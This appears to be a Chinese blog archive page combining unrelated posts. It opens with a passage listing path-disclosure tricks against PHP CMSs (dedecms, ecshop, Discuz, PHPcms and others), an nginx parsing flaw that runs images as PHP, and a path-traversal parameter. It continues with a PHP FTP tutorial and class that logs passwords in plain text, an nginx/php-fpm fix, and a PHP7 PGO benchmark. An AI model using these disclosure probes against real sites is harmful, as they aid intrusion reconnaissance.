Windows:
c:\windows\php.ini                                    php配置文件
c:\windows\system32\inetsrv\MetaBase.xml              IIS虚拟主机配置文件

Linux:
/etc/php.ini                                           php配置文件
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf                             Apache配置文件
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf         虚拟目录配置文件

7、nginx文件类型错误解析爆路径
说明:
这是昨天无意中发现的方法,当然要求Web服务器是nginx,且存在文件类型解析漏洞。有时在图片地址后加/x.php,该图片不但会被当作php文件执行,还有可能爆出物理路径。
www.xxx.com/top.jpg/x.php

8、其他
dedecms
/member/templets/menulit.php
plus/paycenter/alipay/return_url.php
plus/paycenter/cbpayment/autoreceive.php
paycenter/nps/config_pay_nps.php
plus/task/dede-maketimehtml.php
plus/task/dede-optimize-table.php
plus/task/dede-upcache.php

WP
wp-admin/includes/file.php
wp-content/themes/baiaogu-seo/footer.php

ecshop商城系统暴路径漏洞文件
/api/cron.php
/wap/goods.php
/temp/compiled/ur_here.lbi.php
/temp/compiled/pages.lbi.php
/temp/compiled/user_transaction.dwt.php
/temp/compiled/history.lbi.php
/temp/compiled/page_footer.lbi.php
/temp/compiled/goods.dwt.php
/temp/compiled/user_clips.dwt.php
/temp/compiled/goods_article.lbi.php
/temp/compiled/comments_list.lbi.php
/temp/compiled/recommend_promotion.lbi.php
/temp/compiled/search.dwt.php
/temp/compiled/category_tree.lbi.php
/temp/compiled/user_passport.dwt.php
/temp/compiled/promotion_info.lbi.php
/temp/compiled/user_menu.lbi.php
/temp/compiled/message.dwt.php
/temp/compiled/admin/pagefooter.htm.php
/temp/compiled/admin/page.htm.php
/temp/compiled/admin/start.htm.php
/temp/compiled/admin/goods_search.htm.php
/temp/compiled/admin/index.htm.php
/temp/compiled/admin/order_list.htm.php
/temp/compiled/admin/menu.htm.php
/temp/compiled/admin/login.htm.php
/temp/compiled/admin/message.htm.php
/temp/compiled/admin/goods_list.htm.php
/temp/compiled/admin/pageheader.htm.php
/temp/compiled/admin/top.htm.php
/temp/compiled/top10.lbi.php
/temp/compiled/member_info.lbi.php
/temp/compiled/bought_goods.lbi.php
/temp/compiled/goods_related.lbi.php
/temp/compiled/page_header.lbi.php
/temp/compiled/goods_script.html.php
/temp/compiled/index.dwt.php
/temp/compiled/goods_fittings.lbi.php
/temp/compiled/myship.dwt.php
/temp/compiled/brands.lbi.php
/temp/compiled/help.lbi.php
/temp/compiled/goods_gallery.lbi.php
/temp/compiled/comments.lbi.php
/temp/compiled/myship.lbi.php
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/includes/modules/cron/auto_manage.php
/includes/modules/cron/ipdel.php

ucenter爆路径
ucenter\control\admin\db.php

DZbbs
manyou/admincp.php?my_suffix=%0A%0DTOBY57

z-blog
admin/FCKeditor/editor/dialog/fck%5Fspellerpages/spellerpages/server%2Dscripts/spellchecker.php

php168爆路径
admin/inc/hack/count.php?job=list
admin/inc/hack/search.php?job=getcode
admin/inc/ajax/bencandy.php?job=do
cache/MysqlTime.txt

PHPcms2008-sp4
注册用户登陆后访问
phpcms/corpandresize/process.php?pic=../images/logo.gif

bo-blog
PoC:
/go.php/<[evil code]
CMSeasy爆网站路径漏洞
漏洞出现在menu_top.php这个文件中
lib/mods/celive/menu_top.php
/lib/default/ballot_act.php
lib/default/special_act.php

深入PHP FTP类的详解

2016年5月19日 评论已被关闭

深入PHP FTP类的详解

http://www.jb51.net/article/38408.htm

FTP是一种文件传输协议,它支持两种模式,一种方式叫做Standard (也就是Active,主动方式),一种是 Passive (也就是PASV,被动方式)。 Standard模式 FTP 的客户端发送 PORT 命令到FTP server。Passive模式FTP的客户端发送 PASV命令到 FTP Server。
下面介绍一个这两种方式的工作原理:

Standard模式
FTP 客户端首先和FTP Server的TCP 21端口建立连接,通过这个通道 发送命令,客户端需要接收数据的时候在这个通道上发送PORT命令。 PORT命令包含 了客户端用什么端口接收数据。在传送数据的时候,服务器端通过自己的TCP 20端口发送数据。 FTP server必须和客户端建立一个新的连接用来传送数据。

Passive模式
在建立控制通道的时候和Standard模式类似,当客户端通过这个通道发送PASV 命令的时候,FTP server打开一个位于1024和5000之间的随机端口并且通知 客户端在这个端口上传送数据的请求,然后FTP server 将通过这个端口进行数据的传送,这个时候FTP server不再需要建立一个新的和客户端之间的连接。
使用PHP操作FTP-用法

复制代码代码如下:
<?
// 联接FTP服务器
$conn = ftp_connect(ftp.server.com);

// 使用username和password登录
ftp_login($conn, “john”, “doe”);

// 获取远端系统类型
ftp_systype($conn);

// 列示文件
$filelist = ftp_nlist($conn, “.”);

// 下载文件
ftp_get($conn, “data.zip”, “data.zip”, FTP_BINARY);

// 关闭联接
ftp_quit($conn);

//初结化一个FTP联接,PHP提供了ftp_connect()这个函数,它使用主机名称和端口作为参数。在上面的例子里,主机名字为 “ftp.server.com”;如果端口没指定,PHP将会使用“21”作为缺省端口来建立联接。

//联接成功后ftp_connect()传回一个handle句柄;这个handle将被以后使用的FTP函数使用。
$conn = ftp_connect(ftp.server.com);

//一旦建立联接,使用ftp_login()发送一个用户名称和用户密码。你可以看到,这个函数ftp_login()使用了 ftp_connect()函数传来的handle,以确定用户名和密码能被提交到正确的服务器。
ftp_login($conn, “john”, “doe”);

// close connection
ftp_quit($conn);

//登录了FTP服务器,PHP提供了一些函数,它们能获取一些关于系统和文件以及目录的信息。
ftp_pwd()

//获取当前所在的目录
$here = ftp_pwd($conn);

//获取服务器端系统信息ftp_systype()
$server_os = ftp_systype($conn);

//被动模式(PASV)的开关,打开或关闭PASV(1表示开)
ftp_pasv($conn, 1);

//进入目录中用ftp_chdir()函数,它接受一个目录名作为参数。
ftp_chdir($conn, “public_html”);

//回到所在的目录父目录用ftp_cdup()实现
ftp_cdup($conn);

//建立或移动一个目录,这要使用ftp_mkdir()和ftp_rmdir()函数;注意:ftp_mkdir()建立成功的话,就会返回新建立的目录名。
ftp_mkdir($conn, “test”);

ftp_rmdir($conn, “test”);

//上传文件,ftp_put()函数能很好的胜任,它需要你指定一个本地文件名,上传后的文件名以及传输的类型。比方说:如果你想上传 “abc.txt”这个文件,上传后命名为“xyz.txt”,命令应该是这样:
ftp_put($conn, “xyz.txt”, “abc.txt”, FTP_ASCII);

//下载文件:PHP所提供的函数是ftp_get(),它也需要一个服务器上文件名,下载后的文件名,以及传输类型作为参数,例如:服务器端文件为his.zip,你想下载至本地机,并命名为hers.zip,命令如下:
ftp_get($conn, “hers.zip”, “his.zip”, FTP_BINARY);

//PHP提供两种方法:一种是简单列示文件名和目录,另一种就是详细的列示文件的大小,权限,创立时间等信息。

//第一种使用ftp_nlist()函数,第二种用ftp_rawlist().两种函数都需要一个目录名做为参数,都返回目录列做为一个数组,数组的每一个元素相当于列表的一行。
$filelist = ftp_nlist($conn, “.”);

//函数ftp_size(),它返回你所指定的文件的大小,使用BITES作为单位。要指出的是,如果它返回的是 “-1”的话,意味着这是一个目录
$filelist = ftp_size($conn, “data.zip”);

?>

FTP类

复制代码代码如下:
<?php
/**
* 仿写CodeIgniter的FTP类
* FTP基本操作:
* 1) 登陆;    connect
* 2) 当前目录文件列表;  filelist
* 3) 目录改变;   chgdir
* 4) 重命名/移动;  rename
* 5) 创建文件夹;  mkdir
* 6) 删除;    delete_dir/delete_file
* 7) 上传;    upload
* 8) 下载    download
*
* @author quanshuidingdang
*/
class Ftp {
private $hostname = ”;
private $username = ”;
private $password = ”;
private $port   = 21;
private $passive  = TRUE;
private $debug  = TRUE;
private $conn_id  = FALSE;

/**
* 构造函数
*
* @param array 配置数组 : $config = array(‘hostname’=>”,’username’=>”,’password’=>”,’port’=>”…);
*/
public function __construct($config = array()) {
if(count($config) > 0) {
$this->_init($config);
}
}

/**
* FTP连接
*
* @access  public
* @param  array  配置数组
* @return boolean
*/
public function connect($config = array()) {
if(count($config) > 0) {
$this->_init($config);
}

if(FALSE === ($this->conn_id = @ftp_connect($this->hostname,$this->port))) {
if($this->debug === TRUE) {
$this->_error(“ftp_unable_to_connect”);
}
return FALSE;
}

if( ! $this->_login()) {
if($this->debug === TRUE) {
$this->_error(“ftp_unable_to_login”);
}
return FALSE;
}

if($this->passive === TRUE) {
ftp_pasv($this->conn_id, TRUE);
}

return TRUE;
}

/**
* 目录改变
*
* @access  public
* @param  string  目录标识(ftp)
* @param boolean
* @return boolean
*/
public function chgdir($path = ”, $supress_debug = FALSE) {
if($path == ” OR ! $this->_isconn()) {
return FALSE;
}

$result = @ftp_chdir($this->conn_id, $path);

if($result === FALSE) {
if($this->debug === TRUE AND $supress_debug == FALSE) {
$this->_error(“ftp_unable_to_chgdir:dir[“.$path.”]”);
}
return FALSE;
}

return TRUE;
}

/**
* 目录生成
*
* @access  public
* @param  string  目录标识(ftp)
* @param int   文件权限列表
* @return boolean
*/
public function mkdir($path = ”, $permissions = NULL) {
if($path == ” OR ! $this->_isconn()) {
return FALSE;
}

$result = @ftp_mkdir($this->conn_id, $path);

if($result === FALSE) {
if($this->debug === TRUE) {
$this->_error(“ftp_unable_to_mkdir:dir[“.$path.”]”);
}
return FALSE;
}

if( ! is_null($permissions)) {
$this->chmod($path,(int)$permissions);
}

return TRUE;
}

/**
* 上传
*
* @access  public
* @param  string  本地目录标识
* @param string 远程目录标识(ftp)
* @param string 上传模式 auto || ascii
* @param int  上传后的文件权限列表
* @return boolean
*/
public function upload($localpath, $remotepath, $mode = ‘auto’, $permissions = NULL) {
if( ! $this->_isconn()) {
return FALSE;
}

if( ! file_exists($localpath)) {
if($this->debug === TRUE) {
$this->_error(“ftp_no_source_file:”.$localpath);
}
return FALSE;
}

if($mode == ‘auto’) {
$ext = $this->_getext($localpath);
$mode = $this->_settype($ext);
}

$mode = ($mode == ‘ascii’) ? FTP_ASCII : FTP_BINARY;

$result = @ftp_put($this->conn_id, $remotepath, $localpath, $mode);

if($result === FALSE) {
if($this->debug === TRUE) {
$this->_error(“ftp_unable_to_upload:localpath[“.$localpath.”]/remotepath[“.$remotepath.”]”);
}
return FALSE;
}

if( ! is_null($permissions)) {
$this->chmod($remotepath,(int)$permissions);
}

return TRUE;
}

/**
* 下载
*
* @access  public
* @param  string  远程目录标识(ftp)
* @param string 本地目录标识
* @param string 下载模式 auto || ascii
* @return boolean
*/
public function download($remotepath, $localpath, $mode = ‘auto’) {
if( ! $this->_isconn()) {
return FALSE;
}

if($mode == ‘auto’) {
$ext = $this->_getext($remotepath);
$mode = $this->_settype($ext);
}

$mode = ($mode == ‘ascii’) ? FTP_ASCII : FTP_BINARY;

$result = @ftp_get($this->conn_id, $localpath, $remotepath, $mode);

if($result === FALSE) {
if($this->debug === TRUE) {
$this->_error(“ftp_unable_to_download:localpath[“.$localpath.”]-remotepath[“.$remotepath.”]”);
}
return FALSE;
}

return TRUE;
}

/**
* 重命名/移动
*
* @access  public
* @param  string  远程目录标识(ftp)
* @param string 新目录标识
* @param boolean 判断是重命名(FALSE)还是移动(TRUE)
* @return boolean
*/
public function rename($oldname, $newname, $move = FALSE) {
if( ! $this->_isconn()) {
return FALSE;
}

$result = @ftp_rename($this->conn_id, $oldname, $newname);

if($result === FALSE) {
if($this->debug === TRUE) {
$msg = ($move == FALSE) ? “ftp_unable_to_rename” : “ftp_unable_to_move”;
$this->_error($msg);
}
return FALSE;
}

return TRUE;
}

/**
* 删除文件
*
* @access  public
* @param  string  文件标识(ftp)
* @return boolean
*/
public function delete_file($file) {
if( ! $this->_isconn()) {
return FALSE;
}

$result = @ftp_delete($this->conn_id, $file);

if($result === FALSE) {
if($this->debug === TRUE) {
$this->_error(“ftp_unable_to_delete_file:file[“.$file.”]”);
}
return FALSE;
}

return TRUE;
}

/**
* 删除文件夹
*
* @access  public
* @param  string  目录标识(ftp)
* @return boolean
*/
public function delete_dir($path) {
if( ! $this->_isconn()) {
return FALSE;
}

//对目录宏的’/’字符添加反斜杠’\’
$path = preg_replace(“/(.+?)\/*$/”, “\\1/”, $path);

//获取目录文件列表
$filelist = $this->filelist($path);

if($filelist !== FALSE AND count($filelist) > 0) {
foreach($filelist as $item) {
//如果我们无法删除,那么就可能是一个文件夹
//所以我们递归调用delete_dir()
if( ! @delete_file($item)) {
$this->delete_dir($item);
}
}
}

//删除文件夹(空文件夹)
$result = @ftp_rmdir($this->conn_id, $path);

if($result === FALSE) {
if($this->debug === TRUE) {
$this->_error(“ftp_unable_to_delete_dir:dir[“.$path.”]”);
}
return FALSE;
}

return TRUE;
}

/**
* 修改文件权限
*
* @access  public
* @param  string  目录标识(ftp)
* @return boolean
*/
public function chmod($path, $perm) {
if( ! $this->_isconn()) {
return FALSE;
}

//只有在PHP5中才定义了修改权限的函数(ftp)
if( ! function_exists(‘ftp_chmod’)) {
if($this->debug === TRUE) {
$this->_error(“ftp_unable_to_chmod(function)”);
}
return FALSE;
}

$result = @ftp_chmod($this->conn_id, $perm, $path);

if($result === FALSE) {
if($this->debug === TRUE) {
$this->_error(“ftp_unable_to_chmod:path[“.$path.”]-chmod[“.$perm.”]”);
}
return FALSE;
}
return TRUE;
}

/**
* 获取目录文件列表
*
* @access  public
* @param  string  目录标识(ftp)
* @return array
*/
public function filelist($path = ‘.’) {
if( ! $this->_isconn()) {
return FALSE;
}

return ftp_nlist($this->conn_id, $path);
}

/**
* 关闭FTP
*
* @access  public
* @return boolean
*/
public function close() {
if( ! $this->_isconn()) {
return FALSE;
}

return @ftp_close($this->conn_id);
}

/**
* FTP成员变量初始化
*
* @access private
* @param array 配置数组
* @return void
*/
private function _init($config = array()) {
foreach($config as $key => $val) {
if(isset($this->$key)) {
$this->$key = $val;
}
}
//特殊字符过滤
$this->hostname = preg_replace(‘|.+?://|’,”,$this->hostname);
}

/**
* FTP登陆
*
* @access  private
* @return boolean
*/
private function _login() {
return @ftp_login($this->conn_id, $this->username, $this->password);
}

/**
* 判断con_id
*
* @access  private
* @return boolean
*/
private function _isconn() {
if( ! is_resource($this->conn_id)) {
if($this->debug === TRUE) {
$this->_error(“ftp_no_connection”);
}
return FALSE;
}
return TRUE;
}

/**
* 从文件名中获取后缀扩展
*
* @access  private
* @param  string  目录标识
* @return string
*/
private function _getext($filename) {
if(FALSE === strpos($filename, ‘.’)) {
return ‘txt’;
}

$extarr = explode(‘.’, $filename);
return end($extarr);
}

/**
* 从后缀扩展定义FTP传输模式  ascii 或 binary
*
* @access  private
* @param  string  后缀扩展
* @return string
*/
private function _settype($ext) {
$text_type = array (
‘txt’,
‘text’,
‘php’,
‘phps’,
‘php4’,
‘js’,
‘css’,
‘htm’,
‘html’,
‘phtml’,
‘shtml’,
‘log’,
‘xml’
);

return (in_array($ext, $text_type)) ? ‘ascii’ : ‘binary’;
}

/**
* 错误日志记录
*
* @access  prvate
* @return boolean
*/
private function _error($msg) {
return @file_put_contents(‘ftp_err.log’, “date[“.date(“Y-m-d H:i:s”).”]-hostname[“.$this->hostname.”]-username[“.$this->username.”]-password[“.$this->password.”]-msg[“.$msg.”]\n”, FILE_APPEND);
}
}
/*End of file ftp.php*/
/*Location /Apache Group/htdocs/ftp.php*/

DEMO

复制代码代码如下:
<?php
require_once(‘ftp.php’);
$config = array(
‘hostname’ => ‘localhost’,
‘username’ => ‘root’,
‘password’ => ‘root’,
‘port’ => 21
);
$ftp = new Ftp();
$ftp->connect($config);
$ftp->upload(‘ftp_err.log’,’ftp_upload.log’);
$ftp->download(‘ftp_upload.log’,’ftp_download.log’);
/*End of file ftp_demo.php*/
/*Location: /htdocs/ftp_demo.php*/
分类: Linux命令大全, PHP编程 标签:

connect() php-cgi.sock failed (2: No such file or directory) 问题解决

2016年5月16日 评论已被关闭

connect() php-cgi.sock failed (2: No such file or directory) 问题解决

http://www.54rd.net/html/2014/php_1229/3.html

2339 connect() to unix: home xxx php var php-cgi sock failed (2: No such file or directory) while connecting to upstream, client: xxxx,fastcgi_pass,listen_address,nginx
在LMNP服务器架构中,配置好nginx,php服务后,访问http://127.0.0.1/index.php主页时,出现以下错误:

  1. 2339 connect() to unix:/home/xxx/php/var/php-cgi.sock failed (2: No such file or directory) while connecting to upstream, client: xxxx

出现以上问题请检查nginx和php-fpm的配置:

1.nginx配置文件nginx.conf,找到其中配置php-fpm路径的地方

  1. location ~\.php$ {
  2.     root /home/xxxx;
  3.     fastcgi_pass unix:/home/xxx/php/var/php-cgi.sock;
  4.     fastcgi_index index.php;
  5.     include fastcgi.conf;
  6. }

其中fastcgi_pass为配置nginx与php-fpm的交互路径,一般有两种方式
sock方式:fastcgi_pass    unix:/home/xxx/php/var/php-cgi.sock;
http方式:fastcgi_pass    127.0.0.1;9000;
任选其中一种即可,但必须和php-fpm的配置一致。

2.php-fpm配置文件php-fpm.conf,找到其中配置启动方式的地方

  1. <workers>
  2.     <section>
  3.     <value name=“listen_address”>127.0.0.1:9000</value>
  4.         …//省略其他配置
  5.     </section>
  6. </workers>

其中配置为127.0.0.1:9000与nginx中的配置unix:/home/xxx/php/var/php-cgi.sock不符,所以导致报错。
修改php-fpm配置为:
/home/xxx/php/var/php-cgi.sock
或者修改nginx配置为:
fastcgi_pass    127.0.0.1;9000;
都可以解决以上问题。

让你的PHP7更快(GCC PGO)

2016年5月13日 评论已被关闭

让你的PHP7更快(GCC PGO)

http://www.laruence.com/2015/06/19/3063.html

我们一直致力于提升PHP7的性能, 上个月我们注意到GCC的PGO能在Wordpress上能带来近10%的性能提升, 这个让我们很激动.

然而, PGO正如名字所说(Profile Guided Optimization 有兴趣的可以Google), 他需要用一些用例来获得反馈, 也就是说这个优化是需要和一个特定的场景绑定的.

你对一个场景的优化, 也许在另外一个场景就事与愿违了. 它不是一个通用的优化. 所以我们不能简单的就包含这些优化, 也无法直接发布PGO编译后的PHP7.

当然, 我们正在尝试从PGO找出一些共性的优化, 然后手工Apply到PHP7上去, 但这个很明显不能做到针对一个场景的特别优化所能达到的效果, 所以我决定写这篇文章简单介绍下怎么使用PGO来编译PHP7, 让你编译的PHP7能特别的让你自己的独立的应用变得更快.

首先, 要决定的就是拿什么场景去Feedback GCC, 我们一般都会选择: 在你要优化的场景中: 访问量最大的, 耗时最多的, 资源消耗最重的一个页面.

拿Wordpress为例, 我们选择Wordpress的首页(因为首页往往是访问量最大的).

我们以我的机器为例:

  1.        Intel(R) Xeon(R) CPU X5687 @ 3.60GHz X 16(超线程),
  2.        48G Memory

php-fpm 采用固定32个worker, opcache采用默认的配置(一定要记得加载opcache)

以wordpress 4.1为优化场景..

首先我们来测试下目前WP在PHP7的性能(ab -n 10000 -c 100):

  1. $ ab -n 10000 -c 100 http://inf-dev-maybach.weibo.com:8000/wordpress/
  2. This is ApacheBench, Version 2.3 <$Revision: 655654 $>
  3. Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/
  4. Licensed to The Apache Software Foundation, http://www.apache.org/
  5. Benchmarking inf-dev-maybach.weibo.com (be patient)
  6. Completed 1000 requests
  7. Completed 2000 requests
  8. Completed 3000 requests
  9. Completed 4000 requests
  10. Completed 5000 requests
  11. Completed 6000 requests
  12. Completed 7000 requests
  13. Completed 8000 requests
  14. Completed 9000 requests
  15. Completed 10000 requests
  16. Finished 10000 requests
  17. Server Software: nginx/1.7.12
  18. Server Hostname: inf-dev-maybach.weibo.com
  19. Server Port: 8000
  20. Document Path: /wordpress/
  21. Document Length: 9048 bytes
  22. Concurrency Level: 100
  23. Time taken for tests: 8.957 seconds
  24. Complete requests: 10000
  25. Failed requests: 0
  26. Write errors: 0
  27. Total transferred: 92860000 bytes
  28. HTML transferred: 90480000 bytes
  29. Requests per second: 1116.48 [#/sec] (mean)
  30. Time per request: 89.567 [ms] (mean)
  31. Time per request: 0.896 [ms] (mean, across all concurrent requests)
  32. Transfer rate: 10124.65 [Kbytes/sec] received

可见Wordpress 4.1 目前在这个机器上, 首页的QPS可以到1116.48. 也就是每秒钟可以处理这么多个对首页的请求,

现在, 让我们开始教GCC, 让他编译出跑Wordpress4.1更快的PHP7来, 首先要求GCC 4.0以上的版本, 不过我建议大家使用GCC-4.8以上的版本(现在都GCC-5.1了).

第一步, 自然是下载PHP7的源代码了, 然后做./configure. 这些都没什么区别

接下来就是有区别的地方了, 我们要首先第一遍编译PHP7, 让它生成会产生profile数据的可执行文件:

  1. $ make prof-gen

注意, 我们用到了prof-gen参数(这个是PHP7的Makefile特有的, 不要尝试在其他项目上也这么搞哈 )

然后, 让我们开始训练GCC:

  1. $ sapi/cgi/php-cgi -T 100 /home/huixinchen/local/www/htdocs/wordpress/index.php >/dev/null

也就是让php-cgi跑100遍wordpress的首页, 从而生成一些在这个过程中的profile信息.

然后, 我们开始第二次编译PHP7.

  1. $ make prof-clean
  2. $ make prof-use && make install

好的, 就这么简单, PGO编译完成了, 现在我们看看PGO编译以后的PHP7的性能:

  1. $ ab -n10000 -c 100 http://inf-dev-maybach.weibo.com:8000/wordpress/
  2. This is ApacheBench, Version 2.3 <$Revision: 655654 $>
  3. Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/
  4. Licensed to The Apache Software Foundation, http://www.apache.org/
  5. Benchmarking inf-dev-maybach.weibo.com (be patient)
  6. Completed 1000 requests
  7. Completed 2000 requests
  8. Completed 3000 requests
  9. Completed 4000 requests
  10. Completed 5000 requests
  11. Completed 6000 requests
  12. Completed 7000 requests
  13. Completed 8000 requests
  14. Completed 9000 requests
  15. Completed 10000 requests
  16. Finished 10000 requests
  17. Server Software: nginx/1.7.12
  18. Server Hostname: inf-dev-maybach.weibo.com
  19. Server Port: 8000
  20. Document Path: /wordpress/
  21. Document Length: 9048 bytes
  22. Concurrency Level: 100
  23. Time taken for tests: 8.391 seconds
  24. Complete requests: 10000
  25. Failed requests: 0
  26. Write errors: 0
  27. Total transferred: 92860000 bytes
  28. HTML transferred: 90480000 bytes
  29. Requests per second: 1191.78 [#/sec] (mean)
  30. Time per request: 83.908 [ms] (mean)
  31. Time per request: 0.839 [ms] (mean, across all concurrent requests)
  32. Transfer rate: 10807.45 [Kbytes/sec] received

现在每秒钟可以处理1191.78个QPS了, 提升是~7%. 还不赖哈(咦, 你不是说10%么? 怎么成7%了? 呵呵, 正如我之前说过, 我们尝试分析PGO都做了些什么优化, 然后把一些通用的优化手工Apply到PHP7中. 所以也就是说, 那~3%的比较通用的优化已经包含到了PHP7里面了, 当然这个工作还在继续).

于是就这么简单, 大家可以用自己的产品的经典场景来训练GCC, 简单几步, 获得提升, 何乐而不为呢

thanks

分类: PHP编程 标签: